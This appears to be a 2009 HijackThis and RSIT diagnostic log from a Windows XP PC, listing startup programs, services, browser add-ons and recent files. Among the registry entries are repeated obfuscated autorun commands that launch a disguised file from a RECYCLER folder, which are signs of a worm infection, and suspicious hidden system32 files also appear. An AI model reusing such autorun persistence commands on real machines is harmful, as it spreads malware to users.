O2 - BHO: BitComet ClickCapture - {39F7E362-828A-4B5A-BCAF-5B79BFDFEA60} - C:\Program Files\BitComet\tools\BitCometBHO_1.2.2.28.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: ACA Capture - {93C69D87-A11D-4FFC-BC56-BE7EE0D235BA} - C:\Program Files\ACASystems\ACACapturePro\scap003p.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Snagit - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files\TechSmith\Snagit 9\SnagitIEAddin.dll
O4 - HKLM\..\Run: [RecSche] "C:\Program Files\TVR\RecSche.exe"
O4 - HKLM\..\Run: [ChrisTV Agent] "C:\Program Files\ChrisTV\ChrisTV_Agent.exe"
O4 - HKLM\..\Run: [PinnacleDriverCheck] C:\WINDOWS\system32\\PSDrvCheck.exe
O4 - HKLM\..\Run: [amd_dc_opt] C:\Program Files\AMD\Dual-Core Optimizer\amd_dc_opt.exe
O4 - HKLM\..\Run: [lxccmon.exe] "C:\Program Files\Lexmark 3300 Series\lxccmon.exe"
O4 - HKLM\..\Run: [FaxCenterServer] "C:\Program Files\Lexmark Fax Solutions\fm3032.exe" /s
O4 - HKLM\..\Run: [cFosSpeed] C:\Program Files\cFosSpeed\cFosSpeed.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [VC5Player] C:\Program Files\HHVcdV5Sys\VC5Play.exe
O4 - HKLM\..\Run: [UnlockerAssistant] "C:\Program Files\Unlocker\UnlockerAssistant.exe"
O4 - HKLM\..\Run: [CClipboard] C:\Program Files\ComfortClipboard\CClipboard.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [CloneCDTray] "C:\Program Files\SlySoft\CloneCD\CloneCDTray.exe" /s
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [ASUSGamerOSD] C:\Program Files\ASUS\GamerOSD\GamerOSD.exe
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [LXCCCATS] rundll32 C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll,_RunDLLEntry@16
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKLM\..\Run: [COMODO Firewall Pro] "C:\Program Files\Comodo\Firewall\CPF.exe" /background
O4 - HKLM\..\Run: [ISTray] "C:\Program Files\Spyware Doctor\pctsTray.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\Msmsgs.exe" /background
O4 - HKCU\..\Run: [DAEMON Tools] "C:\Program Files\DAEMON Tools\daemon.exe" -lang 1033
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: hpoddt01.exe.lnk = ?
O4 - Global Startup: InterVideo WinCinema Manager.lnk = C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe
O8 - Extra context menu item: Az összes letöltése Free Download Managerrel - file://C:\Program Files\Free Download Manager\dlall.htm
O8 - Extra context menu item: Kijelölés letöltése Free Download Managerrel - file://C:\Program Files\Free Download Manager\dlselected.htm
O8 - Extra context menu item: Letöltés Free Download Managerrel - file://C:\Program Files\Free Download Manager\dllink.htm
O8 - Extra context menu item: Video letöltése a Free Download Manager-rel - file://C:\Program Files\Free Download Manager\dlfvideo.htm
O9 - Extra button: ACA Capture Pro indítása - {905A31AA-BDD1-44bd-9920-53D34E5953A4} - C:\Program Files\ACASystems\ACACapturePro\SCapPro.exe
O9 - Extra button: Kutatás - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {9543741D-4E79-4f0d-8E60-A702CDF8B2D2} - C:\Program Files\ACASystems\ACACapturePro\SCapPro.exe
O9 - Extra 'Tools' menuitem: ACA Capture Pro indítása - {9543741D-4E79-4f0d-8E60-A702CDF8B2D2} - C:\Program Files\ACASystems\ACACapturePro\SCapPro.exe
O9 - Extra button: BitComet - {D18A0B52-D63C-4ed0-AFC6-C1E3DC1AF43A} - res://C:\Program Files\BitComet\tools\BitCometBHO_1.2.2.28.dll/206 (file missing)
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\WINDOWS\system32\shdocvw.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\WINDOWS\system32\shdocvw.dll
O9 - Extra button: @C:\Program Files\Messenger\Msgslang.dll,-61144 - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: @C:\Program Files\Messenger\Msgslang.dll,-61144 - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/s ... wflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{32FFFEDD-3CF7-4BA8-94B2-A780D023C5C4}: NameServer = 84.2.46.1 84.2.44.1
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATK Keyboard Service (ATKKeyboardService) - ASUSTeK COMPUTER INC. - C:\WINDOWS\ATKKBService.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: cFosSpeed System Service (cFosSpeedS) - cFos Software GmbH - C:\Program Files\cFosSpeed\spd.exe
O23 - Service: Comodo Application Agent (CmdAgent) - COMODO - C:\Program Files\Comodo\Firewall\cmdagent.exe
O23 - Service: Diskeeper - Diskeeper Corporation - C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Remote HID Service (LvHidSvc) - Philips - C:\WINDOWS\system32\lvhidsvc.exe
O23 - Service: lxcc_device - Lexmark International, Inc. - C:\WINDOWS\system32\lxcccoms.exe
O23 - Service: NetLimiter (nlsvc) - Locktime Software - C:\Program Files\NetLimiter 2 Pro\nlsvc.exe
O23 - Service: NMSAccessU - Unknown owner - C:\Program Files\CDBurnerXP\NMSAccessU.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
O23 - Service: Acronis Try And Decide Service (TryAndDecideService) - Unknown owner - C:\Program Files\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
O23 - Service: Virtual CD v5 Security service (VC5SecS) - H+H Software GmbH - C:\Program Files\HHVcdV5Sys\VC5SecS.exe

--
End of file - 12376 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\AppleSoftwareUpdate.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00C6482D-C502-44C8-8409-FCE54AD9C208}]
SnagIt Toolbar Loader - C:\Program Files\TechSmith\Snagit 9\SnagitBHO.dll [2008-11-06 68936]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
Adobe PDF Reader hivatkozássúgó - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2006-10-23 62080]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39F7E362-828A-4B5A-BCAF-5B79BFDFEA60}]
BitComet Helper - C:\Program Files\BitComet\tools\BitCometBHO_1.2.2.28.dll [2008-02-29 468280]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre6\bin\ssv.dll [2009-01-14 320920]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{93C69D87-A11D-4FFC-BC56-BE7EE0D235BA}]
CACABHO Object - C:\Program Files\ACASystems\ACACapturePro\scap003p.dll [2006-02-24 102400]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-01-14 34816]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-01-14 73728]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - Snagit - C:\Program Files\TechSmith\Snagit 9\SnagitIEAddin.dll [2008-11-06 211272]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RecSche"=C:\Program Files\TVR\RecSche.exe [2004-05-10 454656]
"ChrisTV Agent"=C:\Program Files\ChrisTV\ChrisTV_Agent.exe [2005-05-02 187392]
"PinnacleDriverCheck"=C:\WINDOWS\system32\\PSDrvCheck.exe [2004-03-11 406016]
"amd_dc_opt"=C:\Program Files\AMD\Dual-Core Optimizer\amd_dc_opt.exe [2007-07-23 77824]
"lxccmon.exe"=C:\Program Files\Lexmark 3300 Series\lxccmon.exe [2005-07-21 192512]
"FaxCenterServer"=C:\Program Files\Lexmark Fax Solutions\fm3032.exe [2005-07-12 299008]
"cFosSpeed"=C:\Program Files\cFosSpeed\cFosSpeed.exe [2007-10-17 854992]
"avast!"=C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe [2009-02-05 81000]
"VC5Player"=C:\Program Files\HHVcdV5Sys\VC5Play.exe [2003-11-07 176128]
"UnlockerAssistant"=C:\Program Files\Unlocker\UnlockerAssistant.exe [2006-05-06 6656]
"CClipboard"=C:\Program Files\ComfortClipboard\CClipboard.exe [2008-06-07 2843136]
"SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2009-01-14 136600]
"CloneCDTray"=C:\Program Files\SlySoft\CloneCD\CloneCDTray.exe [2006-09-28 57344]
"KernelFaultCheck"=C:\WINDOWS\system32\dumprep 0 -k []
"SkyTel"=C:\WINDOWS\SkyTel.EXE [2006-05-20 2879488]
"QuickTime Task"=C:\Program Files\QuickTime\QTTask.exe [2008-09-06 413696]
"RTHDCPL"=C:\WINDOWS\RTHDCPL.EXE [2007-02-03 16116224]
"Alcmtr"=C:\WINDOWS\ALCMTR.EXE [2005-05-07 69632]
"ASUSGamerOSD"=C:\Program Files\ASUS\GamerOSD\GamerOSD.exe [2007-10-23 380928]
"StartCCC"=C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [2009-03-17 61440]
"LXCCCATS"=rundll32 C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\LXCCtime.dll,_RunDLLEntry@16 []
"UserFaultCheck"=C:\WINDOWS\system32\dumprep 0 -u []
"COMODO Firewall Pro"=C:\Program Files\Comodo\Firewall\CPF.exe [2009-06-18 1115728]
"ISTray"=C:\Program Files\Spyware Doctor\pctsTray.exe [2008-12-08 1173384]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe [2004-08-18 15360]
"MSMSGS"=C:\Program Files\Messenger\Msmsgs.exe [2008-06-02 1660952]
"DAEMON Tools"=C:\Program Files\DAEMON Tools\daemon.exe [2007-04-04 165784]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SkyTel]
C:\WINDOWS\SkyTel.EXE [2006-05-20 2879488]

C:\Documents and Settings\All Users\Start Menu\Programs\Indítópult
HP Digital Imaging Monitor.lnk - C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpqtra08.exe
hpoddt01.exe.lnk - C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
InterVideo WinCinema Manager.lnk - C:\Program Files\InterVideo\Common\Bin\WinCinemaMgr.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\!SASWinLogon]
C:\Program Files\SUPERAntiSpyware\SASWINLO.dll [2008-12-22 356352]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtiExtEvent]
C:\WINDOWS\system32\Ati2evxx.dll [2009-03-16 155648]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"=C:\Program Files\SUPERAntiSpyware\SASSEH.DLL [2008-05-13 77824]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"authentication packages"=msv1_0
relog_ap
"notification packages"=
scecli

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdauxservice]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sdcoreservice]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\sdauxservice]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\sdcoreservice]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
""=014

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=36
"NoDrives"=0
"NoDriveAutoRun"=FFFFFFFF

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\concept design\onlineTV 3\onlineTV.exe"="C:\Program Files\concept design\onlineTV 3\onlineTV.exe:*:Enabled:onlineTV"
"C:\Program Files\Pinnacle\Studio 10\programs\RM.exe"="C:\Program Files\Pinnacle\Studio 10\programs\RM.exe:*:Enabled:Render Manager"
"C:\Program Files\Pinnacle\Studio 10\programs\Studio.exe"="C:\Program Files\Pinnacle\Studio 10\programs\Studio.exe:*:Enabled:Studio"
"C:\Program Files\Pinnacle\Studio 10\programs\PMSRegisterFile.exe"="C:\Program Files\Pinnacle\Studio 10\programs\PMSRegisterFile.exe:*:Enabled:PMSRegisterFile"
"C:\Program Files\Pinnacle\Studio 10\programs\umi.exe"="C:\Program Files\Pinnacle\Studio 10\programs\umi.exe:*:Enabled:umi"
"C:\Program Files\uTorrent\uTorrent.exe"="C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent"
"C:\Program Files\eMule\emule.exe"="C:\Program Files\eMule\emule.exe:*:Enabled:eMule"
"C:\WINDOWS\system32\lxcccoms.exe"="C:\WINDOWS\system32\lxcccoms.exe:*:Enabled:3300 Series Server"
"C:\WINDOWS\system32\spool\drivers\w32x86\3\lxccpswx.exe"="C:\WINDOWS\system32\spool\drivers\w32x86\3\lxccpswx.exe:*:Enabled:3300 Series Printer Status"
"C:\Program Files\VoipCheapCom\VoipCheapCom.exe"="C:\Program Files\VoipCheapCom\VoipCheapCom.exe:*:Enabled:VoipCheapCom"
"C:\Program Files\Messenger\Msmsgs.exe"="C:\Program Files\Messenger\Msmsgs.exe:*:Enabled:Windows Messenger"
"C:\Downloads\utorrent.exe"="C:\Downloads\utorrent.exe:*:Enabled:µTorrent"
"C:\Program Files\Java\jre6\bin\javaw.exe"="C:\Program Files\Java\jre6\bin\javaw.exe:*:Enabled:Java(TM) Platform SE binary"
"C:\Program Files\Java\jre6\bin\java.exe"="C:\Program Files\Java\jre6\bin\java.exe:*:Enabled:Java(TM) Platform SE binary"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\concept design\onlineTV 3\onlineTV.exe"="C:\Program Files\concept design\onlineTV 3\onlineTV.exe:*:Enabled:onlineTV"
"C:\Program Files\MSN Messenger\msnmsgr.exe"="C:\Program Files\MSN Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger 8.1"
"C:\Program Files\MSN Messenger\livecall.exe"="C:\Program Files\MSN Messenger\livecall.exe:*:Enabled:Windows Live Messenger 8.1 (Phone)"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{0091bc3c-db4c-11dd-8c0a-001d60523543}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{0091bc3d-db4c-11dd-8c0a-001d60523543}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{882072bb-dc20-11dd-8c0b-001d60523543}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{882072bc-dc20-11dd-8c0b-001d60523543}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL RUNdLl32.ExE .\RECYCLER\S-5-3-42-2819952290-8240758988-879315005-3665\jwgkvsq.vmx,ahaezedrn


======List of files/folders created in the last 1 months======

2009-06-19 11:53:00 ----D---- C:\rsit
2009-06-19 10:29:34 ----D---- C:\Documents and Settings\PALI\Application Data\Convivea
2009-06-19 10:29:33 ----D---- C:\Program Files\Bit Che
2009-06-18 08:02:37 ----D---- C:\Program Files\Common Files\PC Tools
2009-06-18 08:02:29 ----D---- C:\Documents and Settings\All Users\Application Data\PC Tools
2009-06-14 12:09:55 ----D---- C:\Program Files\xyr0x Security
2009-06-14 11:37:37 ----AH---- C:\WINDOWS\system32\shell.exe
2009-06-14 11:37:37 ----A---- C:\WINDOWS\system32\rapid.dll
2009-06-14 11:37:25 ----AH---- C:\WINDOWS\system32\run.bat
2009-06-14 11:37:25 ----A---- C:\WINDOWS\system32\Rapid.exe
2009-06-12 17:29:05 ----D---- C:\Program Files\Driver Cleaner Pro
2009-06-10 22:37:30 ----D---- C:\Documents and Settings\PALI\Application Data\Ashampoo
2009-06-10 21:25:14 ----D---- C:\Documents and Settings\All Users\Application Data\ATI
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\atioglxx.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\atimpc32.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\aticalrt.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\aticaldd.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\aticalcl.dll
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\atibtmon.exe
2009-06-10 21:12:27 ----A---- C:\WINDOWS\system32\atiadlxx.dll
2009-06-10 20:24:06 ----A---- C:\WINDOWS\ATKKBService.exe
2009-06-10 20:24:04 ----A---- C:\WINDOWS\system32\ATKOSDMini.DLL
2009-06-10 20:24:04 ----A---- C:\WINDOWS\system32\atkid.ini
2009-06-10 20:24:04 ----A---- C:\WINDOWS\system32\ATKDispCPL.dll
2009-06-10 20:24:04 ----A---- C:\WINDOWS\system32\ATKDISP.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\xvidvfw.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\xvidcore.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\DPInst.exe
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\devcon.exe
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\ATKOSDX32.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\ATKOGL32.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\asrussian.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\askorean.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\asjapan.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\asgerman.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\asfrench.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\aseng.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\ASCHT.dll
2009-06-10 20:24:03 ----A---- C:\WINDOWS\system32\aschs.dll
2009-06-10 20:12:50 ----R---- C:\WINDOWS\Alcmtr.exe
2009-06-08 22:31:54 ----D---- C:\Program Files\The FilmMachine
2009-06-08 22:19:42 ----R---- C:\WINDOWS\system32\ChCfg.exe
2009-06-08 22:19:20 ----R---- C:\WINDOWS\SoundMan.exe
2009-06-08 22:19:19 ----R---- C:\WINDOWS\SkyTel.exe
2009-06-08 22:19:18 ----R---- C:\WINDOWS\RtlUpd.exe
2009-06-08 22:19:16 ----R---- C:\WINDOWS\RTLCPL.exe
2009-06-08 22:19:10 ----R---- C:\WINDOWS\RTHDCPL.exe
2009-06-08 22:19:09 ----R---- C:\WINDOWS\MicCal.exe
2009-06-08 22:19:06 ----R---- C:\WINDOWS\alcwzrd.exe
2009-06-08 22:19:05 ----D---- C:\Program Files\Realtek
2009-06-08 22:19:00 ----R---- C:\WINDOWS\RtlExUpd.dll
2009-06-05 23:50:34 ----D---- C:\Documents and Settings\PALI\Application Data\ATI
2009-06-05 23:33:17 ----D---- C:\Program Files\My Company Name
2009-06-05 23:27:00 ----D---- C:\Program Files\Common Files\ATI Technologies
2009-06-05 23:22:44 ----A---- C:\WINDOWS\system32\atiiiexx.dll
2009-06-05 23:22:29 ----A---- C:\WINDOWS\system32\ATIDEMGX.dll
2009-06-05 11:54:14 ----D---- C:\Program Files\ATI Technologies
2009-06-01 16:08:01 ----D---- C:\Program Files\FDRLab
2009-05-29 10:03:56 ----D---- C:\WINDOWS\system32\3Planesoft
2009-05-29 10:03:56 ----D---- C:\Program Files\3Planesoft Screensaver Manager
2009-05-29 10:03:48 ----D---- C:\Program Files\Tropical Fish 3D Screensaver

======List of files/folders modified in the last 1 months======

2009-06-19 11:53:03 ----D---- C:\Program Files\HijackThis
2009-06-19 11:53:01 ----D---- C:\WINDOWS\Prefetch
2009-06-19 11:52:51 ----D---- C:\Documents and Settings\PALI\Application Data\uTorrent
2009-06-19 11:45:43 ----D---- C:\Program Files\cFosSpeed
2009-06-19 11:03:48 ----D---- C:\WINDOWS\system32
2009-06-19 10:52:10 ----D---- C:\Downloads
2009-06-19 10:29:33 ----D---- C:\Program Files
2009-06-19 08:42:11 ----D---- C:\Program Files\Mozilla Firefox
2009-06-19 08:26:33 ----D---- C:\WINDOWS\temp
2009-06-19 08:24:51 ----AD---- C:\Documents and Settings\All Users\Application Data\TEMP
2009-06-19 08:19:51 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-06-19 08:19:37 ----A---- C:\WINDOWS\wincmd.ini
2009-06-19 08:15:57 ----D---- C:\WINDOWS\system32\drivers
2009-06-18 19:34:38 ----D---- C:\Program Files\Spyware Doctor
2009-06-18 12:23:31 ----D---- C:\Program Files\FairUse Wizard 2
2009-06-18 12:23:30 ----D---- C:\WINDOWS
2009-06-18 12:23:30 ----D---- C:\32788R22FWJFW
2009-06-18 08:53:59 ----D---- C:\Program Files\Common Files\Elecard
2009-06-18 08:02:37 ----D---- C:\Program Files\Common Files
2009-06-17 19:38:36 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-06-17 19:37:06 ----RSH---- C:\boot.ini
2009-06-17 19:36:48 ----D---- C:\Program Files\Comodo
2009-06-17 11:30:26 ----A---- C:\WINDOWS\NeroDigital.ini
2009-06-16 12:25:16 ----D---- C:\WINDOWS\system32\CatRoot2
2009-06-16 09:58:46 ----D---- C:\Documents and Settings\PALI\Application Data\Vso
2009-06-15 11:12:21 ----A---- C:\WINDOWS\GIB30_32.INI
2009-06-14 22:55:47 ----A---- C:\WINDOWS\v2d.INI
2009-06-14 22:54:39 ----A---- C:\Documents and Settings\PALI\Application Data\FixVTS.ini
2009-06-14 22:52:11 ----D---- C:\Program Files\Avidemux 2.4
2009-06-13 23:40:52 ----SHD---- C:\WINDOWS\Installer
2009-06-13 23:40:52 ----HD---- C:\Config.Msi
2009-06-13 23:40:50 ----A---- C:\WINDOWS\ODBCINST.INI
2009-06-13 23:39:36 ----A---- C:\WINDOWS\ODBC.INI
2009-06-13 23:38:30 ----N---- C:\WINDOWS\Setup1.exe
2009-06-13 23:37:36 ----A---- C:\WINDOWS\ST6UNST.EXE
2009-06-13 22:27:47 ----D---- C:\Program Files\MooGUI
2009-06-13 19:10:31 ----D---- C:\Program Files\Lx_cats
2009-06-13 18:38:08 ----HD---- C:\WINDOWS\inf
2009-06-13 18:23:47 ----D---- C:\Temp
2009-06-13 10:51:27 ----A---- C:\WINDOWS\cFosSpeed_Setup_Log.txt
2009-06-13 09:38:17 ----D---- C:\WINDOWS\Debug
2009-06-10 22:37:05 ----D---- C:\Program Files\Ashampoo
2009-06-10 21:20:30 ----RSD---- C:\WINDOWS\assembly
2009-06-10 21:20:23 ----D---- C:\WINDOWS\WinSxS
2009-06-10 21:14:59 ----RSHDC---- C:\WINDOWS\system32\dllcache
2009-06-10 21:14:52 ----D---- C:\WINDOWS\system32\ReinstallBackups
